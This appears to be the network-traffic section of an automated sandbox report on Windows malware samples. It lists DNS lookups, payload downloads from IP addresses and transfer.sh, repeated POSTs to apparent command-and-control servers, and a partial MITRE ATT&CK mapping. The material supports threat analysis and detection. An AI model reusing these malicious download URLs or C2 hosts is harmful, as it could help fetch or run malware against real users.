User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 122
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 12:17:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

25.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.113.215.185.in-addr.arpa

IN PTR

Response
DNS

z.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

z.nnnaajjjgc.com

IN A

Response

z.nnnaajjjgc.com

IN A

156.236.72.121
GET

https://z.nnnaajjjgc.com/sts/imagd.jpg

ss41.exe

Remote address:

156.236.72.121:443

Request

GET /sts/imagd.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: z.nnnaajjjgc.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 18 Sep 2023 12:17:21 GMT
Content-Type: image/jpeg
Content-Length: 1507532
Last-Modified: Thu, 07 Sep 2023 13:47:29 GMT
Connection: keep-alive
ETag: "64f9d471-1700cc"
Accept-Ranges: bytes
DNS

api.ip.sb

D5C9.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172
GET

https://api.ip.sb/ip

D5C9.exe

Remote address:

104.26.12.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 12:17:18 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F2Xrg3jcqj%2BThrq0t44qhGyCFLTJ2qimmdCU%2BRxRUjOar%2F9FOZbQINFKpBw1L%2Bop1N4C54FXFoOHAXQPqUxmOvFCsX6XhTNe6k8lD%2FVGRY8fRW5ym94HaCr0qg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 80898668da890b8c-AMS
alt-svc: h3=":443"; ma=86400
DNS

38.6.98.141.in-addr.arpa

Remote address:

8.8.8.8:53

Request

38.6.98.141.in-addr.arpa

IN PTR

Response
DNS

121.72.236.156.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.72.236.156.in-addr.arpa

IN PTR

Response
DNS

31.12.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.12.26.104.in-addr.arpa

IN PTR

Response
DNS

147.174.42.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.174.42.23.in-addr.arpa

IN PTR

Response

147.174.42.23.in-addr.arpa

IN PTR

a23-42-174-147deploystaticakamaitechnologiescom
DNS

142.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.121.18.2.in-addr.arpa

IN PTR

Response

142.121.18.2.in-addr.arpa

IN PTR

a2-18-121-142deploystaticakamaitechnologiescom
DNS

app.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

app.nnnaajjjgc.com

IN A

Response

app.nnnaajjjgc.com

IN A

154.221.26.108
GET

http://app.nnnaajjjgc.com/check/safe

ss41.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 12:17:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=744094&key=351a99cb0ff45d184bf89a5d583fdf1d

ss41.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=744094&key=351a99cb0ff45d184bf89a5d583fdf1d HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 12:17:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
GET

http://app.nnnaajjjgc.com/check/safe

ss41.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 12:17:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=744108&key=3e0f2c6d373275e3476c2894179d0579

ss41.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=744108&key=3e0f2c6d373275e3476c2894179d0579 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 12:17:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
DNS

transfer.sh

aspnet_compiler.exe

Remote address:

8.8.8.8:53

Request

transfer.sh

IN A

Response

transfer.sh

IN A

144.76.136.153
GET

https://transfer.sh/get/wFmmpgXXP6/Fowjpnpuw.dll

aspnet_compiler.exe

Remote address:

144.76.136.153:443

Request

GET /get/wFmmpgXXP6/Fowjpnpuw.dll HTTP/1.1
Host: transfer.sh
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/plain; charset=utf-8
Retry-After: Mon, 18 Sep 2023 14:17:33 GMT
Server: Transfer.sh HTTP Server
X-Content-Type-Options: nosniff
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 154.61.71.51
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1695039453
X-Served-By: Proudly served by DutchCoders
Date: Mon, 18 Sep 2023 12:17:28 GMT
Content-Length: 10
DNS

108.26.221.154.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.26.221.154.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

153.136.76.144.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.136.76.144.in-addr.arpa

IN PTR

Response

153.136.76.144.in-addr.arpa

IN PTR

transfersh
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:K0D2L1ItOMEegesL299T_H_qd4lZjw:-HiHS3q9nyr7wAT6
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
POST

https://play.google.com/log?format=json&hasfast=true

msedge.exe

Remote address:

142.251.36.14:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 410
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://accounts.google.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
POST

https://play.google.com/log?format=json&hasfast=true

msedge.exe

Remote address:

142.251.36.14:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 449
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://accounts.google.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hoejq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 122
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Mon, 18 Sep 2023 12:18:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
DNS

c3f8d0ba-0bb9-483d-8f93-930178a5715d.uuid.pojingchongyuan.net

Remote address:

8.8.8.8:53

Request

c3f8d0ba-0bb9-483d-8f93-930178a5715d.uuid.pojingchongyuan.net

IN TXT

Response
DNS

10.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.173.189.20.in-addr.arpa

IN PTR

Response

77.91.68.29:80

http://77.91.68.29/fks/

http

1.3kB
848 B
9
9

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

260 B
5
77.91.68.29:80

http://77.91.68.29/fks/

http

769 B
508 B
7
6

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

260 B
5
77.91.68.29:80

http://77.91.68.29/fks/

http

7.4kB
6.5kB
35
31

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.78:80

http://77.91.68.78/lend/crypt1234.exe

http

60.8kB
1.8MB
1151
1263

HTTP Request

GET http://77.91.68.78/lend/build.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.78/lend/deluxe_crypted.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.78/lend/crypt1234.exe

HTTP Response

200
77.91.68.61:80

http://77.91.68.61/fuza/2.bat

http

54.7kB
1.7MB
1061
1261

HTTP Request

GET http://77.91.68.61/fuza/sunor.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.61/fuza/2.bat

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/rockss.exe

http

87.9kB
5.0MB
1906
3753

HTTP Request

GET http://5.42.65.80/rockss.exe

HTTP Response

200
162.33.179.91:80

http

D5C9.exe

1.4MB
19.1kB
944
295
77.91.68.29:80

http://77.91.68.29/fks/

http

706 B
867 B
7
6

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
185.215.113.25:10195

D6C4.exe

1.4MB
19.6kB
1014
324
141.98.6.38:39001

aspnet_compiler.exe

448 B
684 B
7
7
156.236.72.121:443

https://z.nnnaajjjgc.com/sts/imagd.jpg

tls, http

ss41.exe

52.5kB
1.6MB
1132
1128

HTTP Request

GET https://z.nnnaajjjgc.com/sts/imagd.jpg

HTTP Response

200
104.26.12.31:443

https://api.ip.sb/ip

tls, http

D5C9.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
154.221.26.108:80

http://app.nnnaajjjgc.com/check/?sid=744108&key=3e0f2c6d373275e3476c2894179d0579

http

ss41.exe

2.2kB
1.8kB
19
17

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=744094&key=351a99cb0ff45d184bf89a5d583fdf1d

HTTP Response

200

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=744108&key=3e0f2c6d373275e3476c2894179d0579

HTTP Response

200
144.76.136.153:443

https://transfer.sh/get/wFmmpgXXP6/Fowjpnpuw.dll

tls, http

aspnet_compiler.exe

786 B
5.0kB
9
9

HTTP Request

GET https://transfer.sh/get/wFmmpgXXP6/Fowjpnpuw.dll

HTTP Response

404
142.250.179.141:443

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

tls, http2

msedge.exe

2.2kB
8.7kB
17
20

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true

tls, http2

msedge.exe

3.0kB
10.2kB
17
20

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true
194.169.175.127:80

http://host-host-file8.com/

http

661 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200

8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

1.208.79.178.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.208.79.178.in-addr.arpa
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

1.202.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.202.248.87.in-addr.arpa
8.8.8.8:53

254.211.247.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.211.247.8.in-addr.arpa
8.8.8.8:53

78.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

78.68.91.77.in-addr.arpa
8.8.8.8:53

61.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

61.68.91.77.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

91.179.33.162.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

91.179.33.162.in-addr.arpa
8.8.8.8:53

25.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

25.113.215.185.in-addr.arpa
8.8.8.8:53

z.nnnaajjjgc.com

dns

ss41.exe

62 B
78 B
1
1

DNS Request

z.nnnaajjjgc.com

DNS Response

156.236.72.121
8.8.8.8:53

api.ip.sb

dns

D5C9.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

38.6.98.141.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

38.6.98.141.in-addr.arpa
8.8.8.8:53

121.72.236.156.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

121.72.236.156.in-addr.arpa
8.8.8.8:53

31.12.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.12.26.104.in-addr.arpa
8.8.8.8:53

147.174.42.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

147.174.42.23.in-addr.arpa
8.8.8.8:53

142.121.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

142.121.18.2.in-addr.arpa
8.8.8.8:53

app.nnnaajjjgc.com

dns

ss41.exe

64 B
80 B
1
1

DNS Request

app.nnnaajjjgc.com

DNS Response

154.221.26.108
8.8.8.8:53

transfer.sh

dns

aspnet_compiler.exe

57 B
73 B
1
1

DNS Request

transfer.sh

DNS Response

144.76.136.153
8.8.8.8:53

108.26.221.154.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

108.26.221.154.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

153.136.76.144.in-addr.arpa

dns

73 B
98 B
1
1

DNS Request

153.136.76.144.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
142.250.179.141:443

accounts.google.com

https

msedge.exe

8.9kB
126.3kB
82
132
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.251.36.14
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

14.36.251.142.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

14.36.251.142.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
224.0.0.251:5353

msedge.exe

516 B
8
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

130 B
162 B
2
2

DNS Request

host-host-file8.com

DNS Request

host-host-file8.com

DNS Response

194.169.175.127

DNS Response

194.169.175.127
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
142.251.36.14:443

play.google.com

https

3.5kB
7.1kB
7
10
142.251.36.14:443

play.google.com

https

4.0kB
7.7kB
10
13
8.8.8.8:53

c3f8d0ba-0bb9-483d-8f93-930178a5715d.uuid.pojingchongyuan.net

dns

107 B
181 B
1
1

DNS Request

c3f8d0ba-0bb9-483d-8f93-930178a5715d.uuid.pojingchongyuan.net
8.8.8.8:53

10.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

10.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery